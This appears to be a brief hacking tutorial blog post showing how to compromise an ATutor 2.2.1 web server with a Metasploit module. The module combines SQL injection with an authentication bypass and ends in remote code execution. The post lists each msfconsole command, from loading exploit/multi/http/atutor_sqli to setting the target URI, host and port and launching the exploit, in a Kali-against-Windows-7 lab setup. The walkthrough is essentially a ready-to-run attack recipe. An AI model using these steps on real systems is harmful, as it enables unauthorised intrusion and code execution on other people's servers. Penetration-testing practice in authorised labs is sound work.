Hack Web Server using ATutor 2.2.1 SQL Injection / Remote Code Execution

This module exploits SQL Injection vulnerability and authentication weakness vulnerability in ATutor. This essentially means an attacker can bypass authentication and reach the administrator’s interface where they can upload malicious code.

 Exploit Targets

ATutor 2.2.1

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/http/atutor_sqli

msf exploit (atutor_sqli)>set targeturi /Atutor/

msf exploit (atutor_sqli)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (atutor_sqli)>set rport 80

msf exploit (atutor_sqli)>exploit       

Leave a Reply

Your email address will not be published. Required fields are marked *